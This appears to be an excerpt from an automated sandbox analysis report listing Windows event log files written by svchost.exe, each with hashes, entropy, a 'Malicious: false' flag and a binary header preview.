SHA-512:	9784C3387618E510F3273678F10B3EF5EB14D55F1809DFC126E052651D6DC4885B2BF1FC37C5D222A1F7D4A75D563E0EC1709672B647C94714E6D4599ECEC92E
Malicious:	false
Preview:	ElfChnk......................................................................................................................+..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................*..............5.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	77088
Entropy (8bit):	3.296061569760692
Encrypted:	false
SSDEEP:	384:z+ITIEITInIlIoIDIDIbcIA2IXkI93jImIEIhIY0sIwIRITKItIIdhDIEQAGxIHl:zrvdZxGTMF/CL
MD5:	1359A82CC1412863F44CEAEA7CE635C2
SHA1:	BB1CA16FFF57AC9C05490DCA15989E7232F81BDA
SHA-256:	8E80FDED165897234C1916122B4A410445EAF3C566531CB0F68C81A9783B339A
SHA-512:	7A2D409CF3742A28DB45173C8747E2EB46790255D9E7FFC2DBE574BD40B2AA148E347902645618E8E9C18F4CCC88619E0970964C53625A7CEEE7A99E6443BEE0
Malicious:	false
Preview:	ElfChnk.T...............T...................P...h.....h.....................................................................KW.........................................>...=...........................................................................................................................f...............?...........................m...................M...F............................(...........................X......................1........................................8..........................**......w........E.."R........V....X..............................................................,.......D.....!........... ....@.E.."R.....Pl...m..Pl...........w....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s..z.?..nM.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s./.O.p.e.r.a.t.i.o.n.a.l.........&.......6p.\.#i....>..........2........A..=...>.../....=.......V.o.l.u.m.e.C.o.r.r.e.l.a.t.i.o.n.I.d.......A..7...>...)....=.......V.o.l.u.m.e.N.a.m.e.L.e.n.g.t.h....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8473964145384382
Encrypted:	false
SSDEEP:	384:Yeh6iIvcImIvITIQIoIoI3IEIMIoIBIAI8eI1BIBIEVIfI:YeoxYvg
MD5:	B8BD729014D16BDCC56875E927045A6D
SHA1:	6C96B9607A2E321C85E3140B207C94810642D1DA
SHA-256:	FB594E1E9A976C6D83FE17BD5BDA0650EA764C31FD8C904D30BA8FE437203DF1
SHA-512:	4A37C748DC246DA1EA4D301BF039EF85B6A649DB883C9D91F39090DDA464952304B09EB4738E6595B175A6C2EBF0E1D8B7A80A3B951B2344E93E09477924A2C4
Malicious:	false
Preview:	ElfChnk.....................................X$...%....M......................................................................2lJ............................................=...........................................................................................................................f...............?...........................m...................M...F...........................^.......................................................................................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.037593139626118
Encrypted:	false
SSDEEP:	768:q4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH13V:o
MD5:	AE26EB8C86733AA2FBADA4FBB44600F9
SHA1:	890480EF814AA1F96C03AC19A8E07EE9331AAFCC
SHA-256:	73D13AC531944AE4A35A03D2DB32E856D2515FDCF64DFF0BE521CC7635FBEDBD
SHA-512:	816EC597FE628634ADF6A5E99AA8E20CEA64C18064A5892C5DE5F72A664B8FA617FDB2AEA47306B0BDBCFC6D1ED5FE8D594CC3B3C6988BC6BD1DE012C077BCAB
Malicious:	false
Preview:	ElfChnk.....................................(...8...gn..........................................................................................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F............................................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.426245011175516
Encrypted:	false
SSDEEP:	384:MhhKVKrQoKIKZ8TKnKkKFK9K6GK7VXKR4KVKZKjKSWKtVK4wKnhfKKKP7kKFKKK8:M+R89L3GpVW1/IC1UE1D/eXHTaGjw/Q
MD5:	27085F4738F8E522BE8926BFB4A55870
SHA1:	69B13B6E4E9958EAF2635A0953170098272E3587
SHA-256:	5DFEE2F6C1163169FA03FF8CD1D8685B59D89577BE52673ABDB228A89EFD09DF
SHA-512:	AB04F4D58AC32C8A4C77B13E21DB9E873166765EFEFD852226BD86F69E3EB71C8B10994DA09EF273D007C041B4F3628A6685EB8588AAAE2955B01E23906819A9
Malicious:	false
Preview:	ElfChnk.........>...............>...........................................................................................?-.................l...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................wJ...................-.....................................W%...'.................._@.......9.......3..*..............C...l.........V...&.......V...."[S<..~..f[........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8054444176540313
Encrypted:	false
SSDEEP:	384:/hP8o8Z85848V8M8g8D8R8E8t82U8fM8j8b8:/Fj
MD5:	173544EFADD8E5B22B7B87393BEE28EC
SHA1:	7761FA65139D66A37158BB5F22B3C403106E210D
SHA-256:	0D00247623A5664C48C2664ECA419CB49F069ABAC75A74CAFBA30BFB3AE1728A
SHA-512:	3959BF8F8746BF6DD1C36DC9EF0D1EDEA97B67EBBEA4E00A540860141BEBF7B4CE040F07FB281A99CC18C10A59F5D6D06A5622421CEA4A25AA106579119DF087
Malicious:	false
Preview:	ElfChnk......................................!..0#....z......................................................................7..........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................v...............................&.......................................................................................**..(.............................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	66480
Entropy (8bit):	3.775158791071695
Encrypted:	false
SSDEEP:	1536:rXhzUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:rXdnS
MD5:	723EAFBA9BD8114E33A0288DDD4A357A
SHA1:	9C2CE0CC243F3F8AE0857A0C841FE6C0AA5C4F27
SHA-256:	CE7C5B2DC33BDF912E5B70CDD63CEE249C9BC8BFCC6C9D1E64883FCC30E413BD
SHA-512:	309AD5E5A0F5533D97577C588B1C778C99DF4E6646B071F5FB4BA50E1CC387A8183E4C05F7F64787810DF354335B5A64F23F3CB2119C6AE0CF475739AAC0CDBB
Malicious:	false
Preview:	ElfChnk.........(...............(............L..pN...:h......................................................................l.7................v...........................=...........................................................................................................................f...............?...........................m...................M...F............................9..........................vB..&...............................................................O.......................**......(.......V..l.........V...vB..............................................................\.......t.....!................@V..l......}......So...$.......(....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.R.e.s.o.u.r.c.e.-.E.x.h.a.u.s.t.i.o.n.-.D.e.t.e.c.t.o.r..t....T@...>..$pM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.R.e.s.o.u.r.c.e.-.E.x.h.a.u.s.t.i.o.n.-.D.e.t.e.c.t.o.r./.O.p.e.r.a.t.i.o.n.a.l......LO..................ElfChnk.........(...............(............L..pN...:h.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.4140097162397725
Encrypted:	false
SSDEEP:	768:c0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9OZaaY1EZ290/u00O0X:wcE
MD5:	52D82360FD520B2636848032417269E9
SHA1:	EBCEC73783331C56A595EB67FF025FB3D1807B09
SHA-256:	D1768EADB19BFA52ADD7DD91D2DD1998743903FD33F6A733298480493894E69D
SHA-512:	53A848D4E04EBFAFB129C3939123205CE9F02E916610105E94E446EFBD6720B72A3D4F7B516C7EB0B3FE217096AB8029E26CD33C7801592A44B020251B256103
Malicious:	false
Preview:	ElfChnk.........>...............>...........@x..pz...........................................................................9..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F......................................&............................f...............................................]..........]...................*.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.117541217096697
Encrypted:	false
SSDEEP:	384:dhfixkk1bdzpFEVQ35pmixR5p2ixR5yYkzixR5pnsixR5pFok5pbik5pKik5yY5T:dVLpBVi7CPFKDY21mpI0U
MD5:	7F49DA8AB5DB6EDF35830BA109A0F38D
SHA1:	5CD5A5A9A815FEBFD1C9A54283B6FB6BD7D78AD5
SHA-256:	E8D3B6523A85CC2F5883D8B1AD7FB34677E364166B88B10AFB051DE8F9D16EAA
SHA-512:	4A3F7977A9052C9DA12179737A841A53F74E2C3C82D898A0788DCE594D900B428044B8AE05C29B690CE25EC4F8BCB28EF6FB1BFE804218E68053C658175213B0
Malicious:	false
Preview:	ElfChnk.'.......+.......'.......+............$..X+..M%........................................................................4.................T.......................\|...=...........................................................................................................................f...............?...........................m...................M...F...........................................-...........&...........................................................................................**......'.......~.uql.........V...&.......V...."[S<..~..f[........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.328442817893915
Encrypted:	false
SSDEEP:	384:NHD/hDGCyCkCzCRCFCYC5s+CWC8CtCLCTuCqCRC4Cb8CoCuCVC52i62H2ED2M2Dc:NHD/dzA2pAOJ
MD5:	5DA76C1D65C494891DD1A12EB8483523
SHA1:	4550F2010DBFEB809CA6AEB96AE47DC2D49AF711
SHA-256:	5D67CD8B17AEBF94995A1BF97D80BC1409CD8F48BA150BAC19DD4E976B39E022
SHA-512:	6F0DE210AB707BDF2357AE5D295DD1D6E9D6EA4E42AF071DC19921D57D1B8AE422012B38CD81D958789C8D498EF5B14C24E852D425E4B50E106715AF75CE1263
Malicious:	false
Preview:	ElfChnk.U...............U...................X...`...#..3....................................................................z...................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F............................H..........................ny..&................................................x..............is......................**..0...U.........Df..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.483935185214427
Encrypted:	false
SSDEEP:	1536:jbYYysVM8GZEhmw8P9ZltmtO5KdA2mlbdLE3BDgGhUvJX2yvUNGh09rSMjMEOnLl:jbYYysVM8GZEhmw8P9ZltmtO5KdA2ml/
MD5:	4C9EAF05DF0A544E5850C34036F8E3FF
SHA1:	BDF3CC94443DE28D27ADAA89BB42B5C4B91E0A6E
SHA-256:	18ED1D118F7F347FEE9AC706C38CFB061E761E242105EAD1E07FDE111F43B4C8
SHA-512:	F674DF8C1AAB03843C3DE30A8933F95534A95C20BEEE84A07B8F49A07FC20D28F5C38E0B25998C2DDED26D906A5773E739CB83B20B4BA27175487516AE7ABBE0
Malicious:	false
Preview:	ElfChnk.....................................(^..._..........................................................................jf..........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................&............................O..........................................................................................**.................Ej.........R#,.&.......R#,...t\....iR(.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	70808
Entropy (8bit):	4.442093941856379
Encrypted:	false
SSDEEP:	1536:U4lNCSxiYIALLKj0HPufXEkOycycrdVH2C9khXEtIo77W0RUJ6tXGRh3qyPJYqgF:U4lNZxiYIALLKj0H2fXEkOycycrdVH2u
MD5:	77F0988FAB2988D8D3F033CC14BFAC32
SHA1:	03716B2DDFD43521A5C2FACBAD3D709FBC668A34
SHA-256:	CC9AD5D5FA4B90F093536518965F6714C30889060C747B0E79A9450B4BE59617
SHA-512:	D3C228C4A95D443D098DBE4639E76C412EC42F973676341716634AB53671CBFDDF417622C6770455F5A5DFC05BAF6A836CEEDF84EC64683335BBA04C7CF5D0FF
Malicious:	false
Preview:	ElfChnk.(.......k.......(.......k............}...~..$Td........................................................................d........................................V...=...........................................................................................................................f...............?...........................m...................M...F.......................................................&.......................................Ao.......Y..........ir...V..YR..............![........x...b.........=."R........V...&...............................................................8.......P.....!....nqm......... ..=."R.."../5@.E...............b........................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e..n30'.\|D..Q.R.a.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......LYR..........C.ox.....(...c........h>."R........V...&...............................................................8.......P.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.4811047309915093
Encrypted:	false
SSDEEP:	384:ch67e7W7r7i7J7O727Z7K7A7B7Bn7u7+7q7O7g7Q7x7x7o787F7K7g7v7L7B7y7r:c7m
MD5:	2E6CEC61E2DECF28A9AAC3D02CB02273
SHA1:	070D59D523A9170A9CC6573077CC0CE8A695A76C
SHA-256:	AACFD64ACB92999F93EFC4ED46F299F47BE3957EC0FD3D4BE1BFB590CEA014D4
SHA-512:	F36B3DD188BBADE38FB46E88DDE1D8C63F2A51147692CF81324C4B2B6A7DB0EDA95F293D7D5AE34D3510C3E7A47C052FC55C0FDE96007F9C7DF1535F3BCD912C
Malicious:	false
Preview:	ElfChnk.....................................Pv.. x..9..M......................................................................]0............................................=...........................................................................................................................f...............?...........................m...................M...F...........................M;..............e4..c........S..................................................................M9......................**..@............MG.j.........R#,.&.......R#,...t\....iR(.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.4234349311397776
Encrypted:	false
SSDEEP:	384:Whc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinp:W6Ovc0S5UyEeDgLRXjgvXRa8B
MD5:	59217658366B2509FA3C5AE2BFFBC088
SHA1:	55B8F8A64A65CF082308A18854830EDC21621E5E
SHA-256:	DA0E6873717D053523129076B19908B8111FDF193AB01CA9B84D0E66B528EA59
SHA-512:	91EC38FA62CA2D8150FAA161B59D5A1F86A687EEAD7ECBB467C0CD350B0B0A7E00A90CF2F058B836A76444790F28EB45FC222C94B38057A5D32AA1A85F9AD825
Malicious:	false
Preview:	ElfChnk.........B...............B............{...\|..!.H.......................................................................A.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F.................../g......._..........................Fj..........................................................w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.862948105155997
Encrypted:	false
SSDEEP:	384:jhGuZumutu4uEu5uOuDuyb2uPu1uGu7yuw1uzugu:jWA
MD5:	C6E3EAAF79B9B74847E15062DBDCBDD2
SHA1:	9FCDDE8AE58182517D5AC9D3FC46894BF371E5FA
SHA-256:	5641D304842318A93A4A3F51DBA6C48BBDD521CFB52AA6D69F144EA32B49CBD7
SHA-512:	7D794DE25E4B2BFC21E9291F73E303CC54D512FB2618E4FC44818867191ECCCA237AD69BB5C0BCB4D571109F1B08B71E2342BEABF729D42213B2E0B14E92B9AF
Malicious:	false
Preview:	ElfChnk......................................$..x&...U......................................................................R.v.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................>...............................&.......................................................................................**..............Wy.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.3496875518839038
Encrypted:	false
SSDEEP:	384:iOhGA5AaA5ATrAk3AWAsATdATpATFATIATgATJA4AdA1APAYATuATBAT1ATA0bAk:bNhyY5wo
MD5:	0EC3CDA3A528BF0A5729B89E1A358139
SHA1:	73604785D78AC69BDED4E0145CBC0A4A2B879D95
SHA-256:	5D1AB67361A2BDC834E8DC88AFC5A7BC52427FD0404A0EEDDEBC23B613A21787
SHA-512:	DDDC72B157F1EB1716E9FB26D734F1DFF94F9FE4A709E064B6E07A265CA590DEBCC52B6A84F50B978C9A4002CDCF0D2D7B7FE280F976629ED02A74706E9A5850
Malicious:	false
Preview:	ElfChnk......................................w..Py...........................................................................r..................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................M]......................5W..&........................................A..........................................UE......**..................k.........V...&.......V...."[S<..~..f[........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.1948897756370673
Encrypted:	false
SSDEEP:	384:OJhCpj0npRFdpR0VpRblpRi1pR5FpR4FpR/VpRWNpRt5pR8ppRTpR9pRqpR/Z1pO:OJVZfzK
MD5:	119A74A6EB4E3DCD24AAC59CDA066CB6
SHA1:	9EA2058F915A454FA321572AB1202DF132C61EB0
SHA-256:	7ABFFDBEF98597906F5D9190020862061C0D344E8DA3534EB6E93072581C9D49
SHA-512:	6B7A7733A034B604B85351BC4B2E5607F6AE4D5DE22C73412426B39B06DCB57C7BEB79992C4F4DE2205D7006D91E1D79ABB8AE1EA1BCFFCACB58BA2EB7787D8A
Malicious:	false
Preview:	ElfChnk.........'...............'...............x....d......................................................................uS\|(........................................8...=...........................................................................................................................f...............?...........................m...................M...F.......................................................&...........................................................................................**..............85E.l.........V...&.......V...."[S<..~..f[........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.05389871156127
Encrypted:	false
SSDEEP:	384:hhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBD:hwDoh1VnwAqq6pEPETGwC
MD5:	0D68BB9D8D59E1CC578AB776FCEA4BDA
SHA1:	0BF5606CB5FE98CDB63E92DBAF8D9511524E27CD
SHA-256:	720E52B6452429C30337E6253C1713F83E2F39537C150253416741F87C08FD1A
SHA-512:	2E5912C1CB6E7E52634CD1C9C71BEB57F7334F32989B1FEC217660BD6A0CD24F53038165B8FE2097FC0B3F78EC48DE9F0BF66587891B20430A5D5739E78FAA1E
Malicious:	false
Preview:	ElfChnk.\...............\...................P.........Z......................................................................j.......................................R...=...........................................................................................................................f...............?...........................m...................M...F...........................^................;..............&...................................i...................................mS..............*..8...\........=..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2109210432370807
Encrypted:	false
SSDEEP:	384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCxC5FC4zCxCBCgC:bKFAL
MD5:	4E735688182523E4C28E902DE2F33BA6
SHA1:	5C74904D115A01F69E260912CAF8B65B0937B3FD
SHA-256:	48824D29CF3DB10C4213E4D1C92D8A28E00DA359AE9FC3BBA8BFF346B77C18E1
SHA-512:	A9FFDA7C6594605FFC85780BA8151EF4F653B585654C979FC7F562657DD340311CDB289E6BAADF16906370308FA2589164E27800B79F4660C923F402234532D7
Malicious:	false
Preview:	ElfChnk..................................... 6..X8...).M......................................................................&o................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................v)...........................-....................................................................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	169616
Entropy (8bit):	4.624467808471541
Encrypted:	false
SSDEEP:	384:tuMIYbMzYCMvYUMvY2M6G3MyvMJM4E/2M/M/M/MPM0MwMCMsMSEMzYnMn+MOfMSl:37zxm1ZDEXfV7zxm1nVDEXfV7zxm1AB
MD5:	759E6C3CB93890589215A70E10DBB911
SHA1:	6884D08A70E7891C993A64534FDC8CAD9E31E5AC
SHA-256:	CB3378482CDDCCB399C8E2164FE5F587D1D3C232216A2E632D7745A9742B0EEE
SHA-512:	1ACE605046201A5114DF8EE934C5CE337E52E39EBBA63E005087652AA7BEFDF0AC2ABB61C783B8813F40FDF74F6827F35A83554C23A3177743481D49F4CBC9CF
Malicious:	false
